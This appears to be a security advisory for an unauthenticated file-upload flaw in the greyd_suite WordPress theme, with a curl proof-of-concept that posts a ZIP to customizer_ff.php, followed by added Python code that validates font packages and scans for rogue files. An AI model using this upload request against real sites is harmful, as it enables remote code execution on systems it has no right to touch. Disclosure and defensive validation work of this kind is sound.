The plugin does not properly validate uploaded custom font packages, and does not perform any authorization or CSRF checks, allowing an unauthenticated attacker to upload arbitrary files including PHP source files, leading to possible remote code execution (RCE). Version 1.2.5 added CSRF checks.
Send a POST request to the wp-content/themes/greyd_suite/inc/customizer_ff.php file with the following POST parameters and a ZIP file containing a CSS file and any other content:
curl --location --request POST 'https://theme-tests.docker.test/wp-content/themes/greyd_suite/inc/customizer_ff.php' \
--form 'mode="upload"' \
--form 'uploadpath="hackpath"' \
--form 'name_full="hackname"' \
--form '[email protected];type=application/zip'
This will extract the files into wp-content/themes/greyd_suite/inc/hackpath/hack/ without any checks on the files contained in the ZIP file.
From version 1.2.5, the uploaded files are extracted to wp-content/uploads/greyd_tp/custom_fonts/hack/ instead.
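Added example, not part of the advisory and not the greyd_suite theme's own code: a Python sketch of the two defensive checks the description above implies. validate_font_package() performs the content validation a font-upload handler should run before extracting anything (only CSS and font extensions, no server-side script extension anywhere in a filename, no path traversal, and at least one CSS file, which the page says a legitimate package contains); scan_font_directory() walks an extraction directory such as wp-content/uploads/greyd_tp/custom_fonts/ and lists every file that is not a font asset, which is how a site owner can check whether a rogue package was ever extracted. The allowed-extension list, the function names and the sample archive are assumptions constructed here; the missing authorization and nonce checks are WordPress-side and are not modelled.

```python
"""Added example (not the theme's code): content validation for a custom-font
ZIP package, plus a scan for non-font files in an extraction directory."""
import io
import os
import posixpath
import zipfile

# Assumed allowlist: the file types a font package legitimately needs.
ALLOWED_EXTENSIONS = {".css", ".woff", ".woff2", ".ttf", ".otf", ".eot", ".svg"}
# Extensions a web server may execute; rejected wherever they appear in a
# filename, so "font.php.css" style double extensions are caught as well.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def _is_unsafe_path(name: str) -> bool:
    """True for absolute entries or entries that escape the extraction directory."""
    posix = name.replace("\\", "/")
    if posix.startswith("/") or (len(posix) > 1 and posix[1] == ":"):
        return True
    norm = posixpath.normpath(posix)
    return norm == ".." or norm.startswith("../")


def validate_font_package(zip_bytes: bytes) -> list[str]:
    """Return the reasons a package must be rejected; an empty list means it may be extracted."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    problems: list[str] = []
    has_css = False
    with archive:
        for info in archive.infolist():
            name = info.filename
            if _is_unsafe_path(name):
                problems.append(f"unsafe path: {name}")
                continue
            if info.is_dir():
                continue
            # Every dotted segment after the first counts as an extension.
            segments = posixpath.basename(name).lower().split(".")[1:]
            if any(seg in SCRIPT_EXTENSIONS for seg in segments):
                problems.append(f"server-side script extension: {name}")
                continue
            ext = posixpath.splitext(name)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                problems.append(f"disallowed file type: {name}")
            elif ext == ".css":
                has_css = True
    if not has_css:
        problems.append("package contains no CSS file")
    return problems


def unexpected_font_files(relative_paths) -> list[str]:
    """Given file paths relative to a font directory, return those that are not font assets."""
    return sorted(
        p for p in relative_paths
        if posixpath.splitext(p)[1].lower() not in ALLOWED_EXTENSIONS
    )


def scan_font_directory(root: str) -> list[str]:
    """Walk an on-disk extraction directory and report files a font package should never leave behind."""
    listing = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            rel = os.path.relpath(os.path.join(dirpath, filename), root)
            listing.append(rel.replace(os.sep, "/"))
    return unexpected_font_files(listing)


def build_sample_package(entries: dict[str, bytes]) -> bytes:
    """Constructed test input: build a ZIP in memory from {entry name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, data in entries.items():
            archive.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: a CSS file plus a PHP file, the shape the advisory describes.
    package = build_sample_package({"hack/fonts.css": b"@font-face{}", "hack/x.php": b"<?php"})
    print(validate_font_package(package))  # ['server-side script extension: hack/x.php']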